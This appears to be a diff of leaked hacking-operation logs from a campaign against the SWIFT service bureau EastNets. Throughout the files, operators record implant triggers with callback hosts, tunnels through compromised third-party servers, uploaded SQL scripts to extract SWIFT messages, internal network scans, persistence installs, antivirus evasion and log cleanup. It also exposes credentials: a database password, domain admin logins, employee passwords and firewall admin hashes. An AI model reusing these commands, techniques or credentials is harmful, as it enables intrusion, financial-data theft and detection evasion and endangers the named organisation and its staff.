+	PSP: Symantec Endpoint Protection 11
+    
+    |  3756 |   560 | ------D:\Double-Take\DoubleTake.exe 
+    
+    
+	grep -mask SPFILEACCESS.ORA -path D:\Alliance\Access\Database\database -pattern audit -nocase
+	cd c:\$Recycle.bin
+	put D:\DSZOPSDisk\Preps\swift_msg_queries_all.1368533247.sql -name C:\$Recycle.Bin\S-1-5-~1\$ICD12FA.txt
+	run -command "cmd.exe /q" -redirect
+	D:\alliance\access\database\bin\sqlplus.exe saauser/Aetq9f7CQtljCHtAmstCGF64C
+    1:59 PM 5/14/2013 -- disconnected when running the command
+    1:59 PM 5/14/2013 -- retriggered back on, checking logs
+        
+	SQL>@$ICD12FA.txt
+    
+    output file:$ICD12FB.txt
+    start:20130424
+    end:20130514
+    
+    2:16 PM 5/14/2013 -- getting file
+    2:20 PM 5/14/2013 -- clean up
+    delete $ICD12FA.txt
+    delete $ICD12FB.txt
+	
+	monitor packetredirect -listenport 3333 -raw
+	redirect -tcp -implantlisten 42316 -target 127.0.0.1 42316
+	dir -mask * -path c:\ -age 30m -recursive
+	prettych
+	quitanddelete
+	
+4:06 PM 5/14/2013 -- BURNED
+
+
+======================= T2
+---   192.168.200.86    --- ENSBDNISL1
+=======================
+Win2k8 64 bit R2
+2:31 PM 5/14/2013     PC2 target : 192.168.200.86
+		              source : 192.168.200.11
+                      final  : 192.168.200.86
+                      cb     : 4639, 192.168.200.11
+                      id     : 0x1000125ae
+					  key    : jeepflea_market
+                      ICMP   : ICMP 8,0
+		
+	Uptime:4 days, 16:7:18
+	Auditing:2013-05-14 14:37:03 z0.0.0.14] Security auditing dorked, do not stop command 1601 or you will lose your blessing
+	PSP: Symantec Endpoint Protection 11
+	grep -mask SPFILEACCESS.ORA -path D:\Alliance\Access\Database\database\ -pattern audit -nocase
+    3:03 PM 5/14/2013 -- EMAGENT.EXE not running, grep returned nothing
+	cd C:\$Recycle.Bin\S-1-5-~1
+    put D:\DSZOPSDisk\Preps\initial_oracle_exploit.1368537345.sql -name $ICD12FA.txt
+    	
+    
+    lsnrctl status
+    3:31 PM 5/14/2013 -- looking for listener
+    LSNRCTL for 64-bit Windows: Version 11.2.0.1.0 - Production on 14-MAY-2013 19:29:17
+
+Copyright (c) 1991, 2010, Oracle.  All rights reserved.
+
+Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521))
+TNS-12541: TNS:no listener
+ TNS-12560: TNS:protocol adapter error
+  TNS-00511: No listener
+   64-bit Windows Error: 61: Unknown error
+   
+	run -command "cmd.exe /q" -redirect
+	D:\alliance\access\database\bin\sqlplus.exe / as SYSDBA
+	3:19 PM 5/14/2013 -- failed to connect
+    SQL>@swift_msg_queries_all.sql
+    	
+    ERROR:
+ORA-12560: TNS:protocol adapter error
+
+	dir -mask * -path c:\ -age 3h -recursive
+	prettych
+    eventlogsurvey
+	quitanddelete
+	
+4:08 PM 5/14/2013 -- BURNED

swift/Employee.txt

@@ -0,0 +1,176 @@
+ISP:	LK
+City:	
+Phone:	
+ISP IP:	186.120.114.169
+Source IP:	
+FINAL target IP:	
+Ops Machine:	LOCALHOST.LOCALDOMAIN
+Redirecting Method 1:	PITCHIMPAIR
+Redirect Host 1:	210.135.90.41
+Redirect Target 1:	192.168.1.3
+
+
+BEGIN UNIX OPNOTES:
+
+Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
+--> 210.135.90.41          cnt1.din.or.jp                 pitchimpair          unix      successful    
+---> 192.168.1.3           endxbmail001.eastnets.com      jeepflea_market      windows   successful    
+Ops Machine: WO
+Results:
+
+PROJECT=JEEPFLEA_MARKET
+OPUSER=85521
+OPSCHEDULE=13082113184448
+SCRUBVER=6.007000008
+
+
+======================= P0
+--- 210.135.90.41 --- cnt1
+=======================
+ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41
+2013-08-29 02:44:00 UTC -- on target
+2013-08-29 02:46:02 UTC -- w
+Uptime: 106 day(s),  0:15:26
+2013-08-29 02:57:51 UTC -- tunnels
+-tunnel 
+l 110 213.132.40.101 110 38951
+-rawsend 666
+
+
+2013-08-29 04:06:03 UTC -- checking some others
+-ping 80.227.254.201
+ ICMP Reply (80.227.254.201)   195.906 ms    80.227.254.201 >     210.135.90.41 (TTL  51)  
+-ping -r 80.227.254.201 -i -p 48600
+ ICMP Reply (80.227.254.201)   1.4294166 s    80.227.254.201 >     210.135.90.41 (TTL  51)  
+.... no other open ports
+
+
+
+2013-08-29 04:27:35 UTC -- another target 80.227.254.202
+-ping -r 80.227.254.202 -t -p 2194
+80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)
+-ping -r 80.227.254.202 -t -p 2443
+80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)
+
+
+2013-08-29 05:39:46 UTC -- preburn checks
+2013-08-29 05:39:54 UTC -- bb
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238
+###################
+SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
+:
+/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174
+###################
+Final lines of bwmonitor.txt:
+Thu Aug 29 05:43:04 UTC 2013
+eth0        bytes      (MB)    packets     kbps    (kBps)   kbps-1m  kbps-10m   kbps-hr
+  TX      3429926     (3.3)      13314      0.0     (0.0)       1.3       0.8       0.9
+  RX      4484806     (4.3)      12814      0.0     (0.0)       5.0       1.7       1.5
+
+###################################################
+PROJECT: jeepflea_market
+DATE: 02:42 AM 08/29/2013
+OPUSER: 85521
+OPSCHEDULE: 13082113184448
+#Op Status: Unsuccessful
+#Non-Standard: True
+###################################################
+Targets:
+
+
+
+Results:
+
+
+
+======================= T1
+---   192.168.1.3   --- endxbmail001
+=======================
+2:58 AM 8/29/2013 --- trigger sent
+3:01 AM 8/29/2013 -- failed with only forward tunnel
+3:01 AM 8/29/2013 -- trying with rawsend
+3:03 AM 8/29/2013 -- hadouken...  socketsteal w/ 110
+Uptime: 95 days, 19:0:10
+3:10 AM 8/29/2013 --  Kaspersky Endpoint Security 8.1.0.831
+3:17 AM 8/29/2013 -- hour clean
+3:20 AM 8/29/2013 -- looking for targs
+nslookup endxb-kbaluyot     - 192.168.153.144
+nslookup kbaluyot           - 10.10.10.118
+nslookup managment          - failed
+nslookup endjuy             - failed
+nslookup endxb-asanghvi     - failed
+nslookup asanghvi           - failed
+nslookup juy                - 10.10.10.117
+nslookup vmailbox2          - 192.168.2.12
+nslookup endxb-msyed        - 10.10.10.74 
+nslookup msyed              - failed
+
+3:25 AM 8/29/2013 -- scanning 192.168.153.144
+ping - failed
+rpc 192.168.153.144 1 445   - failed
+3:31 AM 8/29/2013 -- scanning some more targs
+ping 10.10.10.117
+      REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63
+netbios -target 10.10.10.117   - failed
+rpc 10.10.10.117 1 445         - failed
+ping 10.10.10.1                - failed
+ping 10.10.10.118              - failed
+ping 192.168.2.12              - failed
+ping 10.10.10.74               - failed
+ping 80.227.254.243            - failed
+4:20 AM 8/29/2013 -- trying some fws
+banner -ip 80.227.254.201 -tcp -port 2443     - can't reach network
+ping 172.16.104.17             - failed
+
+
+5:12 AM 8/29/2013 -- seeing if they are in
+  REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127
+netbios -target 10.10.10.118
+---------------------------------------------------------------------
+ENDXB-COBAS         UNIQUE REGISTERED        Workstation Service
+EASTNETS            GROUP REGISTERED         Domain Name
+ENDXB-COBAS         UNIQUE REGISTERED        File Server Service
+EASTNETS            GROUP REGISTERED         Browser Service Elections
+
+Adapter Address: 00.26.c6.38.98.30
+Adapter Type   : Ethernet Adapter
+
+netbios -target 192.168.153.144   - fail
+rpc 10.10.10.118 1 445
+
+5:22 AM 8/29/2013 --  netbios -target 10.10.10.23
+ENDXB-CALTAKI       UNIQUE REGISTERED        Workstation Service
+EASTNETS            GROUP REGISTERED         Domain Name
+ENDXB-CALTAKI       UNIQUE REGISTERED        File Server Service
+EASTNETS            GROUP REGISTERED         Browser Service Elections
+
+Adapter Address: 9c.b7.0d.17.7b.e6
+Adapter Type   : Ethernet Adapter
+
+5:31 AM 8/29/2013 -- netbios -target 192.168.2.10
+---------------------------------------------------------------------
+VDC04               UNIQUE REGISTERED        Workstation Service
+EASTNETS            GROUP REGISTERED         Domain Name
+EASTNETS            GROUP REGISTERED         Domain Controller
+VDC04               UNIQUE REGISTERED        File Server Service
+
+Adapter Address: 00.0c.29.8d.e3.3a
+Adapter Type   : Ethernet Adapter
+
+5:37 AM 8/29/2013
+

swift/FATags.txt

@@ -0,0 +1,7 @@
+TLN:  76695 - (QUANTUM against EASTNETS employee network in Duabi 213.132.40.99)
+Start:  30 May 2013
+End:  28 Aug 2013
+Tag:   http://piezasrazonable.com/manual/embed.php? 
+display=APBqRQB4hUYAisRGAKBZRTeMD0AKg7edtbNiacX/yUkZ4L2q30c7QSFfzLnWUjP
+ORMzyIvZEeBnHcdL1Ewk9WgdxrsPQjP1rzdYQmwRCLa+WHb7VIRwIT2obksNwQ7nf 
+

swift/Important NOTES.txt

@@ -0,0 +1,378 @@
+ISP:	LK
+City:	
+Phone:	
+ISP IP:	65.218.69.150
+Source IP:	
+FINAL target IP:	
+Ops Machine:	LOCALHOST.LOCALDOMAIN
+Redirecting Method 1:	INCISION
+Redirect Host 1:	192.168.1.3
+Redirect Target 1:	10.10.10.180
+
+
+BEGIN UNIX OPNOTES:
+
+Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
+---> 202.145.16.4          sunblade.kouku-dai.ac.jp       pitchimpair          unix      successful    
+---> 192.168.1.3           endxbmail001.eastnets.com      jeepflea_market      windows   successful    
+----> 10.10.10.180         store.eastnets.com             jeepflea_market      windows   successful    
+---> 10.10.10.90           endzr-ard.eastnets.com         jeepflea_market      windows   successful    
+Ops Machine: WO
+Results:
+
+PROJECT=JEEPFLEA_MARKET
+OPUSER=57728
+OPSCHEDULE=12110110015132
+SCRUBVER=6.006000035
+
+
+======================= P0
+--- 202.145.16.4 --- sunblade
+=======================
+2012-11-07 05:15:23 UTC  ourtn -wBIN -eY5U /current/up/noserver 202.145.16.4 
+2012-11-07 05:15:38 UTC  on target
+2012-11-07 05:16:00 UTC  Uptime:  37 day(s),  5:45:14
+2012-11-07 05:17:04 UTC  logs are clean
+2012-11-07 05:17:28 UTC  setting up tunnels
+-rawsend 444
+-tunnel
+r 443 192.168.254.72
+r 31219 192.168.254.72
+
+2012-11-07 10:11:55 UTC  tunnels down
+2012-11-07 10:12:45 UTC  logs clean
+2012-11-07 10:13:12 UTC  of target
+
+
+
+
+LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000035 20121107-0505
+###################
+SCRUBHANDS v6.006000035 (suite v6.6.0.35 run in /192.168.254.71) command line:
+:
+/usr/local/bin/scrubhands -t -S 12110110015132 -I 57728 -P JEEPFLEA_MARKET -n 198.6.1.3 65.218.69.150/224/129
+###################
+Final lines of bwmonitor.txt:
+
+Wed Nov  7 10:13:19 UTC 2012
+          RX packets:50189 errors:0 dropped:0 overruns:0 frame:0
+          RX bytes:39381614 (37.5 MiB)  TX bytes:8780195 (8.3 MiB)
+
+###################################################
+Project: JEEPFLEA_MARKET
+Date: 5:13 AM 11/7/2012
+
+### Lines to assist in automated processing
+# Un-comment the "Op Status" line (the line immediately below this one) to mark this op as unsuccessful
+#Op Status: Unsuccessful
+# Un-comment the "Non-Standard" line (the line immediately below this one) to mark this op as a non-standard
+#Non-Standard: True
+
+###################################################
+Targets:
+
+
+
+Results:
+
+======================= T1
+---   192.168.1.3   --- endxbmail001
+=======================
+
+Trigger:  SUCCESSFUL - please update IN NEXT OPPLAN 
+
+           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
+		Target Address    : 213.132.40.101
+		Source Address    : 202.145.16.4
+		Target Protocol   : TCP
+		Target Dst Port   : 110
+		Target Src Port   : 3054
+		TCP Flags         : 0x02
+		Keyfile           : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
+		Callback Address  : 202.145.16.4
+		Callback Dst Port : 443
+		Callback Src Port : 0
+		Redirect through  : 192.168.254.71:444
+		Final Destination : 192.168.1.3
+		Id                : 0x0000000100011bd2
+		Packet Trailer    : 0x4a11
+
+           ----====**** CORDIALFLIMSY TRIGGER END ****====----
+
+5:21 AM 11/7/2012 trigger sent - no callback
+5:28 AM 11/7/2012 retriggered with no CB source port - nope
+5:32 AM 11/7/2012 retrigger with the updated PCID
+5:35 AM 11/7/2012 CALLBACK RECV
+5:35 AM 11/7/2012 WIN2K3 SP 2
+5:36 AM 11/7/2012 PSP installed - Kaspersky Endpoint Security 8 for Windows
+	| Kaspersky Endpoint Security 8 for Windows                | 8.1.0.831       | Kaspersky Lab              | 2012-08-06   |
+	| Kaspersky Security Center Network Agent                  | 9.2.69          | Kaspersky Lab              |              |
+
+5:38 AM 11/7/2012 Uptime: 18 days, 13 hours, 30 minutes, 21 seconds
+		  Idle  : 0 days, 0 hours, 4 minutes, 54 seconds
+
+
+5:39 AM 11/7/2012 Auditing:ON
+
+                     AuditCategorySystem -   Success     Failure
+                      AuditCategoryLogon -                      
+               AuditCategoryObjectAccess -   Success     Failure
+               AuditCategoryPrivilegeUse -   Success     Failure
+           AuditCategoryDetailedTracking -                      
+               AuditCategoryPolicyChange -   Success     Failure
+          AuditCategoryAccountManagement -   Success     Failure
+     AuditCategoryDirectoryServiceAccess -   Success     Failure
+               AuditCategoryAccountLogon -   Success     Failure
+
+
+5:41 AM 11/7/2012 logs are clean
+	dir -mask * -path * -recursive -max 0 -age 15m
+
+5:53 AM 11/7/2012 NO ZB because of PSP
+5:54 AM 11/7/2012 Redirect to target 2  
+	monitor packetredirect -listenport 444 
+	imr 127.0.0.1 2143 2143
+
+8:38 AM 11/7/2012 logs are clean
+8:40 AM 11/7/2012 off target
+
+
+
+
+======================= T2
+---  10.10.10.180   --- store
+=======================
+
+6:03 AM 11/7/2012 trigger sent - success
+           ----====**** CORDIALFLIMSY TRIGGER END ****====----
+
+		Client Version: 2.1.0 (Nov  7 2011 16:44:14)
+
+           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
+		Target Address    : 10.10.10.180
+		Source Address    : 192.168.1.3
+		Target Protocol   : ICMP
+		ICMP type,code    : 8,0
+		Keyfile           : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
+		Callback Address  : 192.168.1.3
+		Callback Dst Port : 2143
+		Callback Src Port : 0
+		Redirect through  : 127.0.0.1:444
+		Final Destination : 10.10.10.180
+		Id                : 0x0000000100010a85
+		Packet Trailer    : 0x61ae
+
+           ----====**** CORDIALFLIMSY TRIGGER END ****====----
+
+
+6:09 AM 11/7/2012 OS:  Win2k3 SP2 32bit 
+6:09 AM 11/7/2012 PSP:  Kaspersky Anti-Virus 8.0 for Windows - not comm with cloud
+	
+	** has been updated
+	| Kaspersky Endpoint Security 8 for Windows                    | 8.1.0.831       | Kaspersky Lab              | 2012-08-01   |
+	| Kaspersky Security Center Network Agent                      | 9.2.69          | Kaspersky Lab              |              |
+
+	** sad face 
+	|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+	|   THIS VERSION APPEARS TO BE UNSUPPORTED.  PLEASE HARASS THOSE RESPONSIBLE.
+	|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+
+6:10 AM 11/7/2012b Uptime: 85 days, 1 hours, 39 minutes, 32 seconds
+		   Idle  : 0 days, 0 hours, 20 minutes, 4 seconds
+
+
+6:12 AM 11/7/2012 Procs previously seen... not a threat
+	- | 2076 |  524 | C:\WINDOWS\system32                                                      | mapsvc.exe          | NT AUTHORITY\SYSTEM          | 2012-06-14 |                                                            |
+	- | 2096 |  524 | C:\WINDOWS\system32                                                      | nfssvc.exe          | NT AUTHORITY\SYSTEM          | 2012-06-14 |                                                            |
+
+6:14 AM 11/7/2012 Auditing:ON - not dorked
+6:22 AM 11/7/2012 conficker still on target
+6:18 AM 11/7/2012 checking logs - we are clean
+	dir -mask * -path * -recursive -max 0 -age 15m
+
+6:38 AM 11/7/2012 need to upgrade to FLAV w/KISU and SOLARTIME
+
+1) install PC KISU w/ FLAV
+	PCID = 0x100011ee9
+	KISU = Installing pc (0x7a43e1fa)
+
+	Version:  2.2.0.5
+Kernel Module Loader:  
+    Registry Key:    \registry\machine\SYSTEM\CurrentControlSet\Services\QDLTx32\Parameters
+    Registry Value:  {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
+User Module Loader:  
+    Registry Key:    
+    Registry Value:  
+Module Store Directory:  
+    Registry Key:    \registry\machine\SYSTEM\CurrentControlSet\Services\CipcCdp\Parameters
+    Registry Value:  {3983D697-20B0-B301-BD80-38DFDA93C8D0}
+Launcher:  
+    Service Name:    SMBios
+    Registry Value:  {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
+Persistence:  
+    Method:  SOTI
+
+Module Id         Size       Order      Flags    Name         Process
+=====================================================================
+0xbb397f32       62464           0      U  EC    UserModuleLoader 32-Bit  
+0xbb397f34          20           0         ECL   Persistence Identifier  
+0xd0000102      171520           1  B  D   EC    ntevt       
+0xd0000100       87552           1    A U  EC    true        services.exe
+    B: BootStart,  S: SystemStart, A: AutoStart,      D: KernelDriver
+    U: UserMode,   R: SystemMode,  K: ServiceKey,     E: Encrypted
+    C: Compressed, L: DemandLoad,  O: AutoStart Once
+
+7:14 AM 11/7/2012 flav install test ... WOW it worked.
+7:21 AM 11/7/2012 we got knocked off the original connection... seems to be ok.
+7:26 AM 11/7/2012 psp_avoidance -enable
+	- --------------------------------
+	- PSP Avoidance changes: SUCCEEDED
+	- --------------------------------
+
+7:27 AM 11/7/2012 removing old PC and DMGZ - delete failed needed to pfroadd
+	pfroadd c:\windows\System32\wship.dll
+
+7:31 AM 11/7/2012 psp_avoidance -disabled
+	- --------------------------------
+	- PSP Avoidance changes: SUCCEEDED
+	- --------------------------------
+
+7:35 AM 11/7/2012  Run a netmap to find targets of interest
+	** Want Sanam Mirchandi if possible, otherwise just an additional UR in the 10.10.10.X subnet
+
+	scansweep -type arp -target 10.10.10.1-10.10.10.254 -period 3s-7s
+
+
+7:36 AM 11/7/2012 ** TARGETS UP **
+
+       Internet Address         State/Type     Physical Address      Interface
+-----------------------------------------------------------------------------------
+                   10.10.10.10  Dynamic      00-0C-29-45-41-EB     10.10.10.180
+                   10.10.10.49  Dynamic      00-1D-BA-F7-EF-DE     10.10.10.180
+                   10.10.10.52  Dynamic      00-16-EA-CA-CD-14     10.10.10.180
+                   10.10.10.55  Dynamic      00-26-C6-38-98-30     10.10.10.180
+                   10.10.10.56  Dynamic      00-22-FA-98-30-5C     10.10.10.180
+                   10.10.10.60  Dynamic      00-1D-72-5D-B5-18     10.10.10.180
+                   10.10.10.70  Dynamic      00-13-E8-CB-55-75     10.10.10.180
+                   10.10.10.86  Dynamic      00-21-5D-46-D9-3C     10.10.10.180
+                   10.10.10.94  Dynamic      E8-39-DF-1B-19-AA     10.10.10.180
+                   10.10.10.95  Dynamic      00-16-EA-BB-A2-84     10.10.10.180
+                  10.10.10.104  Dynamic      00-1E-65-B2-4C-EA     10.10.10.180
+                  10.10.10.124  Dynamic      00-27-13-B3-CA-AA     10.10.10.180
+                  10.10.10.134  Dynamic      5C-26-0A-5D-95-83     10.10.10.180
+                  10.10.10.147  Dynamic      00-21-5D-45-CE-82     10.10.10.180
+                  10.10.10.151  Dynamic      00-21-6A-7F-13-66     10.10.10.180
+                  10.10.10.161  Dynamic      5C-26-0A-5D-96-14     10.10.10.180
+                  10.10.10.230  Dynamic      00-1F-12-25-AB-05     10.10.10.180
+
+
+
+7:37 AM 11/7/2012 scanning up 10.10.10.151 - ragarwal 
+	
+	NativeOS: Windows 7 Professional 7600
+	NativeLanMan: Windows 7 Professional 6.1
+
+7:51 AM 11/7/2012 the old creds failed ....
+	dubai-admin dxbr00t
+	dubai-admin dxbr00t$$		
+	ragarwal ashima2 - local 
+
+	** trying creds updated on 10.10.10.151 - shares = nope
+
+
+8:00 AM 11/7/2012 scanning 10.10.10.55 - dabbagh
+
+	NativeOS: Windows 7 Enterprise 7601 Service Pack 1
+	NativeLanMan: Windows 7 Enterprise 6.1
+
+	** trying creds on 10.10.10.55
+		
+	creds tried: dubai-admin dxbr00t$$		
+	dir \\10.10.10.55\c$\progra~1\Microsoft Forefront UAG\Endpoint Components\3.1.0\
+	Windows Defender
+	exploit? ** nope ** 
+
+8:08 AM 11/7/2012 scanning up 10.10.10.70 - sanam
+		
+	NativeOS: Windows 7 Ultimate N 7601 Service Pack 1
+	NativeLanMan: Windows 7 Ultimate N 6.1
+
+	shares -target 10.10.10.70 -map IPC$ -credentials dubai-admin dxbr00t$$ EASTNETS	
+	dir \\10.10.10.70\c$\progra~1\
+	
+	Kaspersky Anti-Virus 6.0 for Windows Workstations MP4
+	Windows Defender
+	exploit? **nope**
+	
+8:38 AM 11/7/2012 checking the logs... clean
+8:39 AM 11/7/2012 off target
+
+
+
+
+======================= T3
+---  10.10.10.90   --- ENDXB-ARD
+=======================
+
+9:16 AM 11/7/2012 callback recv
+9:16 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
+		  Idle  : 1 days, 15 hours, 51 minutes, 38 seconds	
+
+9:17 AM 11/7/2012 PSP Kaspersky 6.0 
+	| Kaspersky Anti-Virus 6.0 for Windows Workstations     | 6.0.4.1212    | Kaspersky Lab   
+	PRODUCT NAME:             Kaspersky Anti-Virus 6.0 for Windows Workstations
+        VERSION:                  6.0.4.1212
+
+
+9:18 AM 11/7/2012 new proc - Adobe Acrobat
+	- |  748 |  820 | C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat    | AcroBroker.exe       | EASTNETS\ADesear             | 2012-11-07 |   
+
+
+9:24 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
+		  Idle  : 1 days, 15 hours, 51 minutes, 38 seconds
+	
+9:27 AM 11/7/2012 did not dork auditing
+9:41 AM 11/7/2012 Memory Load       : 68%%
+9:45 AM 11/7/2012 firewall Status:  Disabled
+10:09 AM 11/7/2012 downloaded tasking (~20MB)
+10:09 AM 11/7/2012 off target
+
+
+
+
+
+####
+# Lines to assist in techsums
+# NOTEs and ERRORs will automatically generate a techsum
+# You can also enclose any portion of your opnotes in a <TECHSUM> </TECHSUM> block to have that section be included in the
+#   techsum automatically.  Like so:
+# <TECHSUM>
+# Bad things happened.
+# Then more bad things happened.
+# Then it _really_ got bad.
+# </TECHSUM>
+#  Please keep the <TECHSUM> and </TECHSUM> on separate lines
+#  Um...also, those angle brackets (< and >) are actually there, unlike the formats below
+####
+
+###################################################
+#
+# Create lines like the following (without #) to create targetnotes files
+# Targetnotes files are found in the <target IP> directory as targetnotes.txt; you can also create them directly.
+# They will be read to automate actions in future ops.
+#
+# General note to operators
+#NOTE (<target IP>): <here is my note>
+#
+# Do not run this command (it will cause problems on this box)
+#DONOTRUN (<target IP>): <command>
+#
+# This command caused an error (bring it to the attention of the developer)
+#ERROR (<target IP>): <command> <optional: what happened>
+#
+# This process runs all the time and is harmless
+#IGNORE (<target IP>): <executable name>
+#
+# This process was identified
+#ID: <process>=<label>

swift/NOC_firewall_passwords_30May2013.txt

@@ -0,0 +1,6 @@
+set admin name "netscreen"
+set admin password "nHr9JSr5KZ9PcKREMsvHkCEtGSDrpn"
+set admin user "msaeed" password "nF3dKrrkHDHCckxALsfARkBtenLoAn" privilege "all"
+set admin user "adesear" password "nIVbOVrXL41KckIARs+ARwJteKFZYn" privilege "all"
+set admin user "juy" password "nGB6DqrpKxQAc4pI/sxHVLIt1aEskn" privilege "all"
+set admin user "kbaluyot" password "nMSQP4rHLyxHcWqBmsqP9pMtnMGPYn" privilege "all"

swift/Production.txt

@@ -0,0 +1,303 @@
+ISP:	LK
+City:	
+Phone:	
+ISP IP:	79.172.193.160
+Source IP:	
+FINAL target IP:	
+Ops Machine:	LOCALHOST.LOCALDOMAIN
+Redirecting Method 1:	PITCHIMPAIR
+Redirect Host 1:	139.18.13.2
+Redirect Target 1:	192.168.208.11
+Redirecting Method 2:	INCISION
+Redirect Host 2:	192.168.208.11
+Redirect Target 2:	192.168.200.92
+Redirecting Method 3:	INCISION
+Redirect Host 3:	192.168.208.11
+Redirect Target 3:	192.168.200.104
+Redirecting Method 4:	INCISION
+Redirect Host 4:	192.168.208.11
+Redirect Target 4:	192.168.219.245
+
+
+BEGIN UNIX OPNOTES:
+
+Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
+--> 139.18.13.2            isun02.informatik.uni-leipzig.de pitchimpair          unix      successful    
+---> 192.168.208.11        ensbdmgmt2.eastnets.com        jeepflea_market      windows   successful    
+----> 192.168.200.92       ensbdaldn1.eastnets.com        jeepflea_market      windows   successful    
+----> 192.168.200.104      ensbdsl3.eastnets.com          jeepflea_market      windows   successful    
+----> 192.168.219.245      ensbdftp1.eastnets.com         jeepflea_market      windows   successful    
+Ops Machine: WO
+Results:
+
+PROJECT=JEEPFLEA_MARKET
+OPUSER=33159
+OPSCHEDULE=13083019453124
+SCRUBVER=6.007000008
+
+139.18.13.2
+-----------
+ourtn -Y5wBIN -U /current/up/noserver 139.18.13.2
+2013-09-04 15:57:40 UTC -- nothing
+2013-09-04 15:58:53 UTC -- on target
+	  6:00pm  up 362 day(s), 23:26,  0 users,  load average: 4.12, 3.58, 3.50
+	Wed Sep  4 18:00:10 CEST 2013
+	- A41F65B7A04AD58DF1D4F91D97C94693BD2A8783 Sat Aug  8 01:23:18 2009 /bin/netstat - clear
+2013-09-04 16:01:57 UTC -- ran checks, all clear
+2013-09-04 21:26:19 UTC -- bB
+
+
+
+LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130904-1554
+###################
+SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
+:
+/usr/local/bin/scrubhands -t -S 13083019453124 -I 33159 -P JEEPFLEA_MARKET -n 212.92.23.5 79.172.193.160/192/129
+###################
+Final lines of bwmonitor.txt:
+Wed Sep 04 21:33:16 UTC 2013
+eth0        bytes      (MB)    packets     kbps    (kBps)   kbps-1m  kbps-10m   kbps-hr
+  TX     16034996    (15.3)      48981      0.0     (0.0)       1.2       0.5       2.2
+  RX     20821077    (19.9)      50221      0.0     (0.0)       5.0       1.5       4.2
+
+###################################################
+PROJECT: jeepflea_market
+DATE: 04:07 PM 09/04/2013
+OPUSER: 33159
+OPSCHEDULE: 13083019453124
+#Op Status: Unsuccessful
+#Non-Standard: True
+###################################################
+Targets:
+
+
+
+Results:
+
+z0.0.0.11 = 192.168.208.11
+z0.0.0.12 = 192.168.200.92
+z0.0.0.13 = 192.168.200.104
+z0.0.0.14 = 192.168.219.245
+
+192.168.208.11
+--------------
+win2k8 r2 sp1 64bit
+UR - CB 443, 48071
+
+4:27 PM 9/4/2013 - waiting on egg
+4:41 PM 9/4/2013 - nothing yet...
+
+- Configuration:
+- 
+- <?xml version='1.0' encoding='UTF-8' ?>
+- <PCConfig>
+-   <Flags>
+-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
+-     <PCHEAP_CONFIG_FLAG_IGNORE_WIN_FIREWALL/>
+-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
+-   </Flags>
+-   <Id>0x0</Id>
+-   <StartListenHour>0</StartListenHour>
+-   <StopListenHour>0</StopListenHour>
+-   <CallbackAddress>139.18.13.2</CallbackAddress>
+-   <CallbackPorts>
+-     <CallbackPair>
+-       <SrcPort>0</SrcPort>
+-       <DstPort>443</DstPort>
+-     </CallbackPair>
+-     <CallbackPair>
+-       <SrcPort>0</SrcPort>
+-       <DstPort>48071</DstPort>
+-     </CallbackPair>
+-   </CallbackPorts>
+- </PCConfig>
+
+4:55 PM 9/4/2013 - waiting 6min
+5:03 PM 9/4/2013 - go CB
+    Process Id : 628
+    \___ running out of svchost.exe
+    
+   Uptime: 4 days, 5:40:6 
+    
+5:07 PM 9/4/2013 - not dorking, redirecting only
+    
+    - Memory Load       : 59%%
+    - Physical Available: 2482 M
+    - Physical Total    : 6141 M
+    
+    | Drive |  Serial   | Type  |    In use (MB)      | Change (MB) |
+    +-------+-----------+-------+---------------------+-------------+
+    | C     | 7e21-d059 | Fixed | 39246/40975 (95%%)  |           0 |
+    | D     | f028-dfdd | Fixed | 24854/81915 (30%%)  |           0 |
+    | E     | 745f-d1c6 | Fixed | 54792/349872 (15%%) |           0 |
+    | F     | dc32-e5cd | Fixed | 15981/17089 (93%%)  |           0 |
+    | G     |           | Cdrom |                     |             |
+    
+5:17 PM 9/4/2013 - hour clear, survey done
+    REPLY from 192.168.200.92 -> 192.168.208.11 -- TTL: 128
+    REPLY from 192.168.216.110 -> 192.168.208.11 -- TTL: 125
+        ---------------------------------------------------------------------
+        ENSBJMGMT1          UNIQUE REGISTERED        Workstation Service
+        WORKGROUP           GROUP REGISTERED         Domain Name
+        ENSBJMGMT1          UNIQUE REGISTERED        File Server Service
+        WORKGROUP           GROUP REGISTERED         Browser Service Elections
+        WORKGROUP           UNIQUE REGISTERED        Master Browser
+        ??__MSBROWSE__?     GROUP REGISTERED         Master Browser
+
+        Adapter Address: 00.22.64.9b.a1.d0
+        Adapter Type   : Ethernet Adapter
+    
